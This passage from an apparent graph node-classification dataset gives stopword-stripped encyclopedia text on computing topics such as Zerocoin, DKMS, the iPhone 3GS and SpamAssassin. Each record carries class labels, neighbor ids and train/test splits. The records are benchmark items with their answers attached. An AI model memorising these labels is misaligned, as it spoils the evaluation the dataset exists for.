    "text": "Zerocoin_protocol:zerocoin protocol zerocoin privacy protocol proposed johns hopkins university professor matthew d. green graduate students ian miers christina garman 2013 designed extension bitcoin protocol would improve bitcoin transactions anonymity coin-mixing capabilities natively built protocol zerocoin currently compatible bitcoin due public nature blockchain users may privacy compromised interacting network address problem third-party coin mixing service used obscure trail cryptocurrency transactions may 2013 matthew d. green graduate students ian miers christina garman proposed zerocoin protocol cryptocurrency transactions anonymised without going trusted third-party coin destroyed minted erase history coin spent information available reveal exactly coin spent initially zerocoin protocol planned integrated bitcoin network however proposal accepted bitcoin community thus zerocoin developers decided launch protocol independent cryptocurrency project create standalone cryptocurrency implementing zerocoin protocol named moneta september 2016 zcoin xzc first cryptocurrency implement zerocoin protocol launched poramin insom team january 2018 academic paper partially funded zcoin published replacing proof-of-work system memory intensive merkle tree proof algorithm ensuring equitable mining among ordinary users april 2018 cryptographic flaw found zerocoin protocol allows attacker destroy coins owned honest users create coins thin air steal users coins zcoin cryptocurrency team acknowledging flaw stated high difficulty performing attacks low probability giving economic benefit attacker december 2018 zcoin released academic paper proposing lelantus protocol remove need trusted setup hides origin amount coins transaction using zerocoin protocol transactions use zerocoin feature drawn escrow pool coin transaction history erased emerges transactions verified zero-knowledge proofs mathematical way prove statement true without revealing details question 16 november 2013 matthew d. green announced zerocash protocol provides additional anonymity shielding amount transacted zerocash reduces transaction sizes 98 however significantly computationally expensive taking 3.2gb memory generate recent developments protocol reduced 40mb zerocash utilizes succinct non-interactive zero-knowledge arguments knowledge also known zk-snarks special kind zero-knowledge method proving integrity computations proofs less 300 bytes long verified milliseconds contain additional advantage hiding amount transacted well however unlike zerocoin zerocash requires initial set trusted entity developed matthew d. green assistant professor behind zerocoin protocol zcash first zerocash based cryptocurrency began development 2013 late 2014 poramin insom student masters security informatics johns hopkins university wrote paper implementing zerocoin protocol cryptocurrency matthew green faculty member roger ver tim lee zcoin initial investors poramin also set exchanged named satang convert thai baht zcoin directly 20 february 2017 malicious coding attack zerocoin protocol created 370,000 fake tokens perpetrators sold 400 bitcoins 440,000 zcoin team announced single-symbol error piece code allowed attacker create zerocoin spend transactions without corresponding mint unlike ethereum dao event developers opted destroy coins attempt reverse happened newly generated ones september 2018 zcoin introduced dandelion protocol hides origin ip address sender without using onion router tor virtual private network vpn october 2018 unknown user uploaded banned video zcoin blockchain order avoid thai government censorship november 2018 zcoin conducted world first large-scale party elections thailand democrat party using interplanetary file system ipfs december 2018 zcoin implemented merkle tree proof mining algorithm deters usage application-specific integrated circuit asic mining coins memory intensive miners allows ordinary users use central processing unit cpu graphics card mining enable egalitarianism coin mining 30 july 2019 zcoin formally departed zerocoin protocol adopting new protocol called sigma prevents counterfeit privacy coins inflating coin supply achieved removing feature called trusted setup zerocoin protocol pivx cryptocurrency based zerocoin protocol using proof-of-stake mechanism issue new coins validate transactions one criticism zerocoin added computation time required process would need performed primarily bitcoin miners proofs posted blockchain would also dramatically increase size blockchain nevertheless stated original author proofs could stored outside blockchain since zerocoin denomination bitcoin used mint zerocoin anonymity would compromised zerocoins zerocoins denomination currently minted unspent potential solution problem would allow zerocoins specific set denominations however would increase needed computation time since multiple zerocoins could needed one transaction depending specific implementation zerocoin requires two large prime numbers generate parameter easily factored values must either generated trusted parties rely rsa unfactorable objects avoid requirement trusted party setup however possible zerocash protocol",
    "neighbors": [
      8640,
      3713,
      9248,
      9859,
      1776,
      1908,
      8916,
      4827,
      11612,
      1087
    ],
    "mask": "Test"
  },
  {
    "node_id": 4281,
    "label": 1,
    "text": "Join_dependency:join dependency area computer science known dependency theory join dependency constraint set legal relations database scheme table formula_1 subject join dependency formula_1 always recreated joining multiple tables subset attributes formula_1 one tables join attributes table formula_1 join dependency called trivial join dependency plays important role fifth normal form also known project-join normal form proven scheme formula_5 decomposed tables formula_6 formula_7 decomposition lossless-join decomposition legal relations formula_5 restricted join dependency formula_5 called formula_10 another way describe join dependency say relationships join dependency independent unlike case functional dependencies sound complete axiomatization join dependencies though axiomatization exist expressive dependency languages full typed dependencies however implication join dependencies decidable let formula_5 relation schema let formula_12 decomposition formula_5 relation formula_14 satisfies join dependency join dependency trivial one formula_17 formula_5 2-ary join dependencies called multivalued dependency historical artifact fact studied general case specifically u set attributes r relation r satisfies formula_19 r satisfies formula_20 given pizza-chain models purchases table customer order-number customer-name pizza-name courier following relations derived since relationships independent join dependency follows order-number customer-name order-number pizza-name order-number courier customer courier however join-dependency like order-number customer-name order-number pizza-name order-number courier customer-name courier order-number customer-name courier order-number pizza-name would valid well makes obvious join dependency enough normalize database scheme",
    "neighbors": [
      5792,
      4065,
      5794,
      5795,
      2022,
      6983,
      2024,
      2025,
      2026,
      1292,
      244,
      9143,
      3004,
      6782
    ],
    "mask": "None"
  },
  {
    "node_id": 4282,
    "label": 3,
    "text": "Dynamic_Kernel_Module_Support:dynamic kernel module support dynamic kernel module support dkms program/framework enables generating linux kernel modules whose sources generally reside outside kernel source tree concept dkms modules automatically rebuilt new kernel installed essential feature dkms automatically recompiles dkms modules new kernel version installed allows drivers devices outside mainline kernel continue working linux kernel upgrade another benefit dkms allows installation new driver existing system running arbitrary kernel version without need manual compilation precompiled packages provided vendor dkms written linux engineering team dell 2003 included many distributions ubuntu debian fedora suse arch dkms free software released terms gnu general public license gpl v2 later dkms supports rpm deb package formats out-of-the-box",
    "neighbors": [
      1952,
      5096,
      3791,
      7983,
      11221,
      2230,
      823,
      1400
    ],
    "mask": "None"
  },
  {
    "node_id": 4283,
    "label": 2,
    "text": "IPhone_3GS:iphone 3gs iphone 3gs originally styled iphone 3g smartphone designed marketed apple inc third generation iphone successor iphone 3g introduced june 8 2009 wwdc 2009 took place moscone center san francisco iphone named 3gs stood speed phil schiller mentioned launch keynote improvements include performance 3-megapixel camera higher resolution video ability voice control support 7.2 mbit/s hsdpa downloading remains limited uploading apple implemented hsupa protocol released united states canada six european countries june 19 2009 australia japan june 26 internationally july august 2009 iphone 3gs runs apple ios operating system succeeded apple flagship smartphone 2010 iphone 4 june 24 8gb model released discontinuing 16 32gb models however 3gs continued production september 2012 iphone 5 announced iphone 3gs made available pre-order june 7 2009 released june 19 united states canada 7 european countries june 26 australia united kingdom within first weekend release one million iphone 3gs units sold new features iphone 3gs mainly internal changes regarding speed iphone 3gs speedy 2x faster predecessor though addition upgrades mainly regarding performance various software features also introduced exclusive iphone 3gs video recording voice control digital compass features ios apple mobile operating system user interface ios based concept direct manipulation using multi-touch gestures interface control elements consist sliders switches buttons interaction os includes gestures swipe tap pinch reverse pinch specific definitions within context ios operating system multi-touch interface internal accelerometers used applications respond shaking device one common result undo command rotating vertically one common result switching portrait landscape mode lcd display device designed apple made lg features capacitive touchscreen pixel density 163 pixels per inch ppi 480-by-320 display improvements predecessor screen include 24-bit color emulation 18-bit color display plus dithering color rich display oleophobic coating help reduce fingerprints display capacitive touchscreen designed bare finger multiple fingers multi-touch sensing iphone 3gs features improved 3-megapixel camera manufactured omnivision addition higher pixel count also features auto-focus auto white balance auto macro capable capturing vga video iphone 3gs camera app features slider allows users switch capturing photos recording videos tap-to-focus feature allows users tap area camera image auto-focus 5x digital zoom ios 4 later auto focus auto exposure lock holding area ios 5 later gridlines composition ios 5 later iphone 3gs powered samsung apl0298c05 chip designed manufactured samsung first iphone system-on-a-chip system-on-a-chip composed arm cortex-a8 cpu core underclocked 600 mhz 833 mhz integrated powervr sgx 535 gpu 256 mb package package pop dram twice amount 3g allowing increased performance multi-tasking apple claims iphone 3gs 2x faster predecessor showing demonstrations various apps loading half time predecessor previous models data stored flash memory sim offer options expand storage initially available 16 32 gb though 8 gb model later released apple discontinuing 16 32 gb models forcing needing storage select iphone 4 buy older model 3gs iphone 3gs powered internal 3.7 v 1220 mah rechargeable lithium-ion polymer battery designed retain 80 original capacity 400 full charge discharge cycles battery life indicator percentage also exclusive iphone 3gs apple claims 3gs last ten hours video nine hours web browsing wi-fi twelve hours 2g talk time five 3g 30 hours music 300 hours standby magnetometer also built-in iphone 3gs used measure strength and/or direction magnetic field vicinity device sometimes certain devices radio signals interfere magnetometer requiring users either move away interference re-calibrate moving device figure 8 motion iphone 3gs also features compass app unique time release showing compass points direction magnetic field addition iphone 3g tri-band umts/hsdpa radio quad-band gsm/gprs/edge radio 3gs also adds support 7.2 mbit/s hsdpa allowing faster downlink speeds though upload speeds remain apple implemented hsupa protocol updates include addition built-in nike+ipod sensor eliminates need external sensor allows native nike+ipod support bluetooth server iphone 3gs also slightly improved adding support bluetooth 2.1 specifications voice control introduced exclusive feature iphone 3gs allows controlling phone music features phone voice two ways activate voice control hold home button home screen seconds change effect double-clicking home button activate voice control ios 3.x ios 4 later double clicking home button opens multitasking bar voiceover color inversion text zoom introduced exclusive features iphone 3gs voiceover feature dictates music details system menus text things first introduced third generation ipod shuffle color inversion reverses color scheme black white white black text zoom allows users zoom text screen iphone 3gs retains design 3g glossy plastic back tapered edges metal buttons 3gs reflective silver text reverse side matches silver apple logo replacing 3g grey text unlike predecessor iphone 3gs available white black 16 gb 32 gb although 8 gb model available black reviews iphone 3gs generally mixed favorable walt mossberg wall street journal described device packed new features makes great product even better many users software may enough boost keep buying new model engadget also said additions video recording compass speed bump n't seem compelling us device managed receive numerous favorable reviews cnet gave iphone 3gs 4 5 stars citing battery life improvements speed bump engadget praised performance improvements 8 gb version received favorable reviews mainly comes pre-installed ios 4 jason snell macworld praised iphone 3gs saying device internal changes shines ios 4 update making iphone 3gs worthwhile upgrade compared predecessor although little late compared iphone 4 tipb stated aside hardware specific features like facetime retina display gyroscope support bottom line iphone 3gs users getting software makes iphone 4 great shortly release iphone 3gs users reported overheating device heavy use others reported discoloration device due heat particularly white models discoloration issues largely discounted result iphone covers rubbing back iphone apple responded heat issue reports warning users leaving iphones car hot day leaving direct sunlight extended periods time refraining heavy usage hot/sunny environment also worth pointing temperature specifications iphone operated follows safety standards countries 3gs released release iphone 4 iphone 3gs received update ios 4 release iphone 4s 3gs still offered free contract november 2011 raised price 59 cents explanation 99¢ price available two-year contract united states three-year contract telus rogers bell fido solutions canada departure apple previous trends two phones sold september 9 2009 apple launched updated model iphone 3gs patched segment overflow securerom device allowed loading unsigned llb release iphone 4s apple updated baseband hardware infineon baseband chip toshiba baseband chip week 2 production 2011 removed end-user ability change basebands although new chip uses modem firmware infineon chip updated ipad baseband 06.15.00 still vulnerable at+xapp exploit 3gs received ios 6 making first ios device receive updates four major ios releases although 3gs still supported major features ios 6 supported 3gs generally positive reviews smooth performance ios 5 even claim better performance making still good candidate ios 6 september 12 2012 apple announced would longer selling supporting iphone 3gs device receive ios 7 due hardware limitations february 21 2014 apple issued ios 6.1.6 fix infamous goto fail ssl security bug",
    "neighbors": [
      4609,
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      5138,
      11289,
      7706,
      1057,
      1576,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      11430,
      171,
      2735,
      3248,
      3772,
      7869,
      199,
      3790,
      9424,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      11062,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2388,
      3928,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6537,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      2502,
      456,
      1482,
      9163,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      7154,
      11257,
      6654
    ],
    "mask": "Train"
  },
  {
    "node_id": 4284,
    "label": 5,
    "text": "FHFS_(file_server):fhfs file server fhfs ftp http web server package transparently based hfs filezilla fhfs built act all-in-one user-based file hosting website good schools businesses etc whose students/employees need easily transport files fhfs designed specifically account-based storage easily compatible uses using over-top original hfs setup early development started january 2011 beta builds tested october 2011 version 1.0 released 11/3/2011 fhfs started accelerate development filesplat.com well showcase capabilities hfs macros fhfs 2.0 released 10/28/2012 exactly one year first beta 1.0 fhfs loosely based source code www.filesplat.com time created developer filesplat longer uses fhfs fhfs written several different languages including hfs macros xml xhtml css javascript dos php c fhfs recognized developer hfs fhfs 2.0.5 contains roughly 9500 somewhat-compressed lines 412,000 characters original code addition standard features hfs",
    "neighbors": [
      225,
      8644,
      3462,
      7983,
      4059,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 4285,
    "label": 3,
    "text": "MB86900:mb86900 mb86900 microprocessor produced fujitsu implements sparc v7 instruction set architecture developed sun microsystems first implementation sparc introduced 1986 used first sparc-based workstation sun microsystems sun-4 1987 chipset operated 16.67 mhz chipset consisted two chips mb86900 microprocessor mb86910 floating-point unit chip set implemented two 20,000-gate 1.2 µm complementary metal–oxide–semiconductor cmos gate-arrays fabricated fujitsu limited",
    "neighbors": [
      9090,
      9731,
      1801,
      4235,
      1809,
      4241,
      1818,
      8863,
      1707,
      2731,
      10926,
      3247,
      9137,
      6322,
      4664,
      6464,
      7104,
      9665,
      2895,
      3919,
      597,
      2269,
      9955,
      7270,
      11626,
      5358,
      1776,
      11636,
      1399,
      1788
    ],
    "mask": "Test"
  },
  {
    "node_id": 4286,
    "label": 3,
    "text": "Temporal_multithreading:temporal multithreading temporal multithreading one two main forms multithreading implemented computer processor hardware simultaneous multithreading distinguishing difference two forms maximum number concurrent threads execute given pipeline stage given cycle temporal multithreading number one simultaneous multithreading number greater one authors use term super-threading synonymously many possible variations temporal multithreading classified two sub-forms main processor pipeline may contain multiple threads context switches effectively occurring pipe stages e.g. barrel processor form multithreading expensive coarse-grained forms execution resources span multiple pipe stages may deal multiple threads also contributing cost fact design optimized around concept background thread — concurrent threads implemented hardware might require state read written cycle forms temporal multithreading similar many ways simultaneous multithreading simultaneous process hardware must store complete set states per concurrent thread implemented hardware must also preserve illusion given thread processor resources fairness algorithms must included types multithreading situations prevent one thread dominating processor time and/or resources temporal multithreading advantage simultaneous multithreading causes lower processor heat output however allows one thread executed time",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      6184,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      2140,
      1122,
      4194,
      3175,
      5223,
      8810,
      4205,
      8815,
      630,
      6774,
      8822,
      7802,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      2210,
      6818,
      6821,
      5798,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      2241,
      2243,
      9932,
      5329,
      4308,
      10966,
      2264,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      6909,
      8447,
      1798,
      1801,
      6926,
      6415,
      785,
      1298,
      11539,
      7963,
      2339,
      6950,
      2345,
      4909,
      3886,
      7983,
      309,
      8501,
      5948,
      4928,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      6476,
      8523,
      7505,
      9044,
      11604,
      344,
      2394,
      8543,
      1376,
      11618,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      1480,
      466,
      2008,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      7142,
      10725,
      2536,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 4287,
    "label": 5,
    "text": "Circuit-level_gateway:circuit-level gateway circuit-level gateway type firewall circuit-level gateways work session layer osi model shim-layer application layer transport layer tcp/ip stack monitor tcp handshaking packets determine whether requested session legitimate information passed remote computer circuit-level gateway appears originated gateway firewall technology supervises tcp handshaking among packets confirm session genuine firewall traffic cleaned based particular session rules may controlled acknowledged computers circuit-level firewalls conceal details protected network external traffic helpful interdicting access impostors circuit-level firewalls clean entity packets circuit-level gateways relatively inexpensive advantage hiding information private network protect hand filter individual packets",
    "neighbors": [
      3941,
      2118,
      8998,
      11502,
      9715,
      3381,
      1942,
      5405,
      4895
    ],
    "mask": "None"
  },
  {
    "node_id": 4288,
    "label": 7,
    "text": "Xactly_Corporation:xactly corporation xactly corporation pure-play saas company provides cloud-based enterprise software services offer tools allow sales performance management sales effectiveness sales compensation employee engagement xactly corporation headquartered san jose california company raised 116 million funding since inception 2005 investors include rembrandt venture partners alloy ventures key venture partners bay partners outlook ventures illuminate ventures silicon valley bank wellington financial salesforce.com xactly corp created march 1 2005 founder ceo christopher w. cabrera co-founder managing director satish k. palvai company headquartered san jose california xactly corp acquired centive automated incentive compensation management technology solutions company 2009 july 31 2017 company taken private vista equity partners delisted new york stock exchange",
    "neighbors": [
      10090,
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 4289,
    "label": 7,
    "text": "GreenButton:greenbutton greenbutton new zealand-based software firm company specialized moving independent software vendors isvs enterprises cloud computing founded 2006 greenbutton based wellington new zealand additional offices palo alto california seattle greenbutton acquired microsoft 2 may 2014 technologies integrated azure service greenbutton founded intergrid 2006 wellington new zealand provide small scale customers access job processors company helped software vendors use cloud computing offering service called greenbutton july 2010 2011 company renamed greenbutton joined microsoft partner network 2011 greenbutton declared microsoft corp ’ windows azure isv partner year 2011 new zealand partner year award microsoft new zealand may 2011 greenbutton entered alliance microsoft included investment reported us 1 million adding mark canepa board directors greenbutton bizspark partner year software exporter year awards ms new zealand 2011 dave fellows greenbutton solutions architect year award year december 2011 greenbutton opened two offices united states office palo alto california functioned us headquarters second sales office seattle greenbutton finalists new zealand hi-tech awards company total turnover 1.5 million fiscal year 2011-12 greenbutton partnered pixar animation studios microsoft cloud computing platform windows azure rendering service renderman image generating software announced january 2012 service enhances renderman interface specification june 2012 greenbutton announced partnership gns science new zealand american based stillwater group cloud computing seismic processing company promoted software integrated seismic processing amazon web services aws cloud service seismic processing part oil natural gas exploration process requires heavy processing data 2012 greenbutton entered partnership numerix american company develops software risk analysis financial derivatives award 2012 wellington gold awards 2 may 2014 greenbutton announced acquisition microsoft technology integrated microsoft azure greenbutton stopped accepting new customers day acquisition greenbutton operates microsoft azure product line azure batch",
    "neighbors": [
      1539,
      6150,
      526,
      4623,
      3605,
      10265,
      5662,
      5666,
      9766,
      39,
      5159,
      7215,
      3121,
      5681,
      8757,
      10820,
      4683,
      590,
      1102,
      7248,
      5202,
      9812,
      4704,
      4194,
      10338,
      5732,
      617,
      7796,
      6265,
      2170,
      4236,
      6797,
      10893,
      10900,
      3224,
      7838,
      6307,
      2217,
      6827,
      9906,
      7352,
      7359,
      194,
      3269,
      1224,
      10957,
      4816,
      6367,
      740,
      9448,
      2795,
      3819,
      253,
      8446,
      259,
      4356,
      8451,
      11524,
      782,
      272,
      11030,
      2328,
      4377,
      8986,
      11549,
      11038,
      7456,
      7970,
      3875,
      11559,
      1832,
      6441,
      6444,
      8495,
      3890,
      11060,
      11070,
      8515,
      8520,
      9033,
      6476,
      4429,
      1362,
      11605,
      4439,
      7512,
      11103,
      3428,
      2919,
      10090,
      8044,
      9585,
      5499,
      1916,
      11646,
      6018,
      6027,
      911,
      1935,
      8592,
      405,
      2965,
      929,
      10681,
      448,
      2496,
      11201,
      3527,
      9682,
      467,
      4051,
      11221,
      10200,
      6618,
      6632,
      1001,
      8681,
      7660,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 4290,
    "label": 7,
    "text": "Avature:avature avature privately held global human capital management software company sells software service company founded dimitri boylan co-founder former ceo hotjobs incorporated dublin ireland operating subsidiaries argentina australia china germany spain united kingdom united states avature platform designed support development strategic hr solutions talent acquisition talent management used 160 countries 24 languages company 650 customers including 110 fortune 500 well several government entities educational institutions 2018 company 600 employees originally founded recruiting outsourcing service provider new york buenos aires 2005 avature provided services large organizations global staffing firms september 2008 company commercially released flagship product avature crm flexible enterprise platform global talent acquisition market leader sourcing recruitment marketing candidate engagement 2012 avature sold recruiting services businesses korn ferry focused efforts development technology subsequent years company ’ product suite expanded include additional talent acquisition solutions applicant tracking campus events recruiting onboarding well talent management solutions including internal mobility performance management contingent workforce management october 2008 human resource executive magazine pointed avature crm top hr product 2010 identified gartner 'cool vendor´ innovations human capital management company also recognized hro today 2012 tektonic award talent management furthermore avature contingent workforce management solution avature cwm named 2018 top hr product human resource executive magazine october 2018 saas report named avature chief financial officer ana laura darino within annual top women leaders saas list",
    "neighbors": [
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 4291,
    "label": 2,
    "text": "Nokia_E5-00:nokia e5-00 nokia e5-00 also called nokia e5 qwerty smartphone runs symbian os v9.3 operating system like phones nokia eseries targeted b2b comes business software applications including quickoffice office document editor released third quarter 2010 comes candybar form factor casing five color options e5-00 similar e72 dram memory e72 also important cost reductions one cost reduction technology lcds screen e5-00 transmissive lcd display e-72 transflective lcd e5 supports 256k display colors important cost reductions removal secondary camera accelerometer digital compass third full focus camera extends depth field without narrowing aperture instead autofocus e5-00 smaller battery 1200 mah e-72 1500 talk-time 8 hours stand time 10 days also features gps integrated assisted runs nokia maps 3.0 ovi maps nokia e5 supports mail exchange ibm lotus notes traveler corporate emails e5 supports hd voice nokia e5-00 features im instant messenger allowing access several chat services communities simultaneously include yahoo messenger google talk skype wechat whatsapp windows live messenger reception e5 generally positive cnet uk praised quality full qwerty keyboard criticized performance 320 x 240 pixel lcd quoting virtually impossible see direct sunlight softpedia contrast stated lcd worked perfectly sunlight softpedia wrote e5-00 all-rounder performs decent areas though also stated camera strong point",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      3323,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4292,
    "label": 9,
    "text": "Starling_Framework:starling framework starling open source game framework used create 2d games run mobile desktop platforms recreates traditional flash display list architecture top accelerated graphics hardware several commercial games built starling including angry birds friends incredipede starling initiated 2011 adobe shortly introducing stage3d api air flash run-time systems stage3d allows utilizing gpu inside flash player via low-level api starling simplify transition developers providing accompanying high-level api built top stage3d framework seen rapid adoption years utilized many games independent commercial developers part adobe gaming sdk since starling introduction several open source libraries published 3rd party developers depend starling extend functionality",
    "neighbors": [
      803,
      8071,
      9579,
      10097,
      2804,
      4378
    ],
    "mask": "None"
  },
  {
    "node_id": 4293,
    "label": 9,
    "text": "Syntax_Definition_Formalism:syntax definition formalism syntax definition formalism sdf metasyntax used define context-free grammars formal way describe formal languages express entire range context-free grammars current version sdf3 parser parser generator sdf specifications provided part free asf+sdf meta environment operate using sglr scannerless glr parser sdf parser outputs parse trees case ambiguities parse forests features sdf following example defines simple boolean expression syntax sdf2",
    "neighbors": [
      1956,
      932,
      4519,
      2537,
      2316,
      11475,
      5399,
      1116
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4294,
    "label": 4,
    "text": "Apache_SpamAssassin:apache spamassassin apache spamassassin computer program used e-mail spam filtering uses variety spam-detection techniques including dns-based fuzzy-checksum-based spam detection bayesian filtering external programs blacklists online databases released apache license 2.0 part apache foundation since 2004 program integrated mail server automatically filter mail site also run individual users mailbox integrates several mail programs apache spamassassin highly configurable used system-wide filter still configured support per-user preferences apache spamassassin created justin mason maintained number patches earlier program named filter.plx mark jeftovic turn begun august 1997 mason rewrote jeftovic code scratch uploaded resulting codebase sourceforge april 20 2001 summer 2004 project became apache software foundation project later officially renamed apache spamassassin spamassassin 3.4.2 release first well three years developers say project picked new set developers moving forward apache spamassassin perl-based application mail :spamassassin cpan usually used filter incoming mail one several users run standalone application subprogram another application milter sa-exim exiscan mailscanner mimedefang amavis client spamc communicates daemon spamd client/server embedded mode operation performance benefits certain circumstances may introduce additional security risks typically either variant application set generic mail filter program called directly mail user agent supports whenever new mail arrives mail filter programs procmail made pipe incoming mail apache spamassassin adjustment user .procmailrc file apache spamassassin comes large set rules applied determine whether email spam rules based regular expressions matched body header fields message apache spamassassin also employs number spam-fighting techniques rules called tests spamassassin documentation test score value assigned message matches test criteria scores positive negative positive values indicating spam negative ham non-spam messages message matched tests apache spamassassin combines results global score assigned message higher score higher probability message spam apache spamassassin internal configurable score threshold classify message spam usually message considered spam matches multiple criteria matching single test usually enough reach threshold apache spamassassin considers message spam rewritten default configuration content mail appended mime attachment brief excerpt message body description tests resulted mail classified spam score lower defined settings default information tests passed total score still added email headers used post-processing less severe actions tagging mail suspicious apache spamassassin allows per-user configuration behavior even installed system-wide service configuration read file database configuration users specify individuals whose emails never considered spam change scores certain rules user also define list languages want receive mail apache spamassassin assigns higher score mails appear written another language apache spamassassin based heuristics pattern recognition software exhibits false positives false negatives apache spamassassin also supports methods added reasonably easily writing perl plug-in apache spamassassin apache spamassassin reinforces rules bayesian filtering user administrator feeds examples good ham bad spam filter order learn difference two purpose apache spamassassin provides command-line tool sa-learn instructed learn single mail entire mailbox either ham spam typically user move unrecognized spam separate folder run sa-learn folder non-spam folder spam separately alternatively mail user agent supports sa-learn called individual emails regardless method used perform learning spamassassin bayesian test help score future e-mails based learning improve accuracy apache spamassassin free/open source software licensed apache license 2.0 versions prior 3.0 dual-licensed artistic license gnu general public license codice_1 utility distributed apache spamassassin compiles spamassassin ruleset deterministic finite automaton allows apache spamassassin use processor power efficiently apache spamassassin designed trigger gtube 68-byte string similar antivirus eicar test file string inserted rfc 5322 formatted message passed apache spamassassin engine apache spamassassin trigger weight 1000",
    "neighbors": [
      6161,
      1047,
      8217,
      8224,
      10276,
      37,
      11303,
      8747,
      9789,
      7742,
      7233,
      7750,
      7764,
      7261,
      8799,
      8294,
      6762,
      8810,
      2163,
      6774,
      5249,
      5253,
      10377,
      11418,
      8860,
      6313,
      4272,
      4793,
      6338,
      10434,
      1222,
      4294,
      10952,
      5835,
      5334,
      8408,
      11492,
      2281,
      8425,
      747,
      8941,
      3837,
      8460,
      1296,
      10530,
      3877,
      1837,
      4398,
      1327,
      7983,
      9014,
      4919,
      1851,
      7485,
      4419,
      2887,
      4944,
      6993,
      1363,
      11610,
      7518,
      865,
      11111,
      1913,
      8582,
      4490,
      1419,
      7567,
      914,
      3988,
      11161,
      6555,
      11163,
      10661,
      3508,
      5047,
      4538,
      6074,
      1991,
      5066,
      8139,
      1495,
      9179,
      990,
      10719,
      11235,
      5093,
      5612,
      7159,
      1018,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4295,
    "label": 4,
    "text": "CBL_Index:cbl index cbl index ratio number ip addresses given ip subnet subnetwork number cbl composite blocking list listings subnet may used measure clean compromised computers given subnet higher number cleaner subnet cbl index may represented decibels db cidr suffix */xx note spam researchers prefer use percentage ips listed subnet using percentages better suited unclean subnets clean nets significantly less 1 addresses listed cbl dnsbl composite blocking list lists ip addresses compromised virus spam sending infection computer worm computer virus spamware cbl full zone data available publicly via rsync download cbl index reasonably good tool getting estimates subnet outgoing spam reputation treated caution subnets often contain ips radically different purposes assuming ips within subnet represent risk/reputation potentially dangerous cbl index may used estimation overall anti-spam performance isp operator cbl zone dated 2007-07-07t21:03+00:00 166_086 ip addresses listed 83.0.0.0/11 network cbl index net 2_097_152/166_086 12.6 */28.3 11.0 db 2_097_152 number ip addresses */11 network 2** 32-11",
    "neighbors": [
      8224,
      7739,
      119,
      2041,
      827
    ],
    "mask": "None"
  },
  {
    "node_id": 4296,
    "label": 6,
    "text": "Xarchiver:xarchiver xarchiver front-end various command line archiving tools linux bsd operating systems designed independent desktop environment default archiving application xfce lxde uses gtk+2 toolkit provide program interface therefore capable running system gtk+2 support exists large number applications also use toolkit support widespread among linux distributions irrespective specific desktop solution supported formats time version 0.5.2 appropriate installed program 7z arj bzip2 gzip lha lzma lzop rar rpm deb tar zip xarchiver uses direct save protocol xds drag drop file saving program acts front-end various commonly installed libraries dealing supported compression formats xarchiver ca n't create archives whose archiver installed currently xfce master branch xarchiver continued github",
    "neighbors": [
      6022,
      10121,
      1420,
      1940,
      5397,
      3222,
      9880,
      3114,
      10027,
      7983,
      950,
      823,
      6713,
      9151,
      2755,
      11076,
      1352,
      10317,
      10575,
      4561,
      722,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      5096,
      7529,
      4459,
      237,
      1646,
      7667,
      6389,
      4089,
      2045,
      894,
      10623
    ],
    "mask": "Train"
  },
  {
    "node_id": 4297,
    "label": 5,
    "text": "MiNET:minet minet stimulus protocol carries keystroke information telephone set call control server also used carry information set control simple text displays mitel corporation designed 1980s signaling protocol proprietary digital tdm telephone sets later used control mitel ip sets encapsulated within tcp mitel uses alternative functional protocol sip maintain practical life pbx call control software",
    "neighbors": [
      3168,
      10924,
      10271
    ],
    "mask": "None"
  },
  {
    "node_id": 4298,
    "label": 6,
